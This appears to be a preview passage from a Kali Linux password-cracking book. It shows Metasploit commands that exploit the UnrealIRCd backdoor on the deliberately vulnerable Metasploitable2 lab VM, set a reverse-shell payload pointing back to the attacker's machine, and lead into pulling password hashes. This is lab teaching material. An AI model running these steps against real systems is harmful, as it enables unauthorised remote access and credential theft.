Obtaining Linux Passwords
Metasploitable2 is a purposefully vulnerable Linux system. I cover it extensively in my Basic Kali book, so we will just quickly look at the exploit and password hash recovery here. We will use Kali Linux as our attacking system and use the Metasploit Framework to handle the exploit and hash recovery. We will use the UnrealIRCd backdoor exploit, and then pull the passwords from the system.
➢ Start your Metasploitable 2 VM
➢ On your Kali VM, run Metasploit
➢ In Metasploit enter, “use exploit/unix/irc/unreal_ircd_3281_backdoor”
➢ Enter, “set payload cmd/unix/reverse”
➢ set LHOST [Kali_IP]
➢ set RHOST [Metasploitable2_IP]
➢ And then, “exploit”
This will open a remote Linux command shell, ...
Get Password Cracking with Kali Linux now with the O’Reilly learning platform.
O’Reilly members experience books, live events, courses curated by job role, and more from O’Reilly and nearly 200 top publishers.
